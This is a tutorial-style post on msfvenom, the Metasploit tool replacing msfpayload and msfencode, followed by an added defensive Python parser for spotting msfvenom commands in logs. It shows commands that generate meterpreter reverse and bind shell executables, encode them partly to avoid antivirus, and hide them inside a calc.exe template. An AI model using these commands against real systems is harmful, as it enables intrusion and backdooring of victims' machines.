Msfvenom: One Single Tool Instead Of Msfpayload And Msfencode


From 8 June 2015, we will no longer have the services of msfpayload and msfencode. They are being retired permanently. Yes, permanently, and of course this is bad news. Both tools have served us for ten years, but the time has come to say goodbye. Thank you, msfpayload and msfencode, for serving us at every level of hacking and penetration testing; we will never forget you.

But the good news is that msfpayload and msfencode are being replaced by a new tool called msfvenom. It combines both tools, it has been in testing for almost three and a half years, and the time has come to use it.

msfvenom is a combination of Msfpayload and Msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

msfvenom supports a wide range of options. To start using it, first take a look at the options it supports:

root-Manin@kali:~# msfvenom -h
Usage: /usr/bin/msfvenom [options] <var=val>
    -p, --payload    <payload>       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    <length>        Prepend a nopsled of [length] size on to the payload
    -f, --format     <format>        Output format (use --help-formats for a list)
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       <architecture>  The architecture to use
        --platform   <platform>      The platform of the payload
    -s, --space      <length>        The maximum size of the resulting payload
    -b, --bad-chars  <list>          The list of characters to avoid example: '\x00\xff'
    -i, --iterations <count>         The number of times to encode the payload
    -c, --add-code   <path>          Specify an additional win32 shellcode file to include
    -x, --template   <path>          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -o, --options                    List the payload's standard options
    -h, --help                       Show this message
        --help-formats               List available formats

Basic usage of msfvenom

How to generate a payload

To generate a payload, there are two flags that you must supply (-p and -f):

  • The -p flag: Specifies what payload to generate

To see what payloads are available from Framework, you can do:

./msfvenom -l payloads

The -p flag also supports “-” as a way to accept a custom payload:

cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw

  • The -f flag: Specifies the format of the payload

Syntax example:

./msfvenom -p windows/meterpreter/bind_tcp -f exe

To see what formats are supported, you can do the following to find out:

./msfvenom --help-formats

Typically, this is probably how you will use msfvenom:

$ ./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Attacker’s IP] lport=4444 -f exe -o /tmp/my_payload.exe

How to encode a payload

By default, the encoding feature will automatically kick in when you use the -b flag (the badchar flag). In other cases, you must use the -e flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -f raw

To find out what encoders you can use, you can use the -l flag:

./msfvenom -l encoders

You can also encode the payload multiple times using the -i flag. Sometimes more iterations may help avoid antivirus, but know that encoding isn’t really meant to be used as a real AV evasion solution:

./msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3

How to avoid bad characters

The -b flag is meant to be used to avoid certain characters in the payload. When this option is used, msfvenom will automatically find a suitable encoder to encode the payload:

./msfvenom -p windows/meterpreter/bind_tcp -b '\x00' -f raw

How to supply a custom template

By default, msfvenom uses templates from the msf/data/templates directory. If you’d like to choose your own, you can use the -x flag like the following:

./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe

Please note: If you’d like to create an x64 payload with a custom x64 template for Windows, then instead of the exe format, you should use exe-only:

./msfvenom -p windows/x64/meterpreter/bind_tcp -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

The -x flag is often paired with the -k flag, which allows you to run your payload as a new thread from the template. However, this currently is only reliable for older Windows machines such as x86 Windows XP.
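For defenders, the standardized options above also make msfvenom command lines easy to pick apart when they turn up in shell history or process-creation logs. The following is an added example, not part of the original article or of Metasploit: it parses command lines and extracts the payload, format, template, output path and var=val pairs. The function names and the sample log lines are constructed for illustration.

```python
import os
import shlex

TOOLS = {"msfvenom", "msfpayload", "msfencode"}  # new tool plus the two retired ones
# Options that take a value, as listed in the help text above.
VALUE_OPTS = {
    "-p": "payload", "--payload": "payload", "-f": "format", "--format": "format",
    "-e": "encoder", "--encoder": "encoder", "-i": "iterations", "--iterations": "iterations",
    "-b": "bad_chars", "--bad-chars": "bad_chars", "-x": "template", "--template": "template",
    "-a": "arch", "--arch": "arch", "--platform": "platform",
}

def parse_invocation(cmdline):
    """Return a dict describing a logged command line, or None if no tool is invoked."""
    try:
        tokens = shlex.split(cmdline)
    except ValueError:  # unbalanced quote, e.g. a truncated log line
        tokens = cmdline.split()
    start = next((i for i, t in enumerate(tokens) if os.path.basename(t) in TOOLS), None)
    if start is None:
        return None
    info = {"tool": os.path.basename(tokens[start]), "datastore": {}}
    args, i = tokens[start + 1:], 0
    while i < len(args):
        tok = args[i]
        nxt = args[i + 1] if i + 1 < len(args) else None
        if tok in VALUE_OPTS and nxt is not None:
            info[VALUE_OPTS[tok]] = nxt
            i += 1  # skip the consumed value
        elif tok in ("-o", ">") and nxt is not None and not nxt.startswith("-"):
            info["output"] = nxt  # -o with a path, or a shell redirection
            i += 1
        elif "=" in tok and not tok.startswith("-"):
            key, _, val = tok.partition("=")
            info["datastore"][key.upper()] = val  # var=val pairs such as lhost/lport
        i += 1
    return info

# Constructed sample lines (not from a real host); 192.0.2.10 is a documentation address.
SAMPLE_LOG = [
    "./msfvenom -p windows/meterpreter/reverse_tcp lhost=192.0.2.10 lport=4444 -f exe -o /tmp/my_payload.exe",
    "cat payload_file.bin | ./msfvenom -p - -a x86 --platform win -e x86/shikata_ga_nai -f raw",
    "./msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -f exe > new.exe",
    "ls -la /tmp",
]

def triage(lines):
    """Parse every line and keep only those that invoke one of the tools."""
    return [hit for hit in map(parse_invocation, lines) if hit]
```

Calling `triage(SAMPLE_LOG)` returns three records; the callback host and port in `datastore` and the `output` path are the values worth pivoting on during an investigation.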

Official announcement article from Rapid7 Community
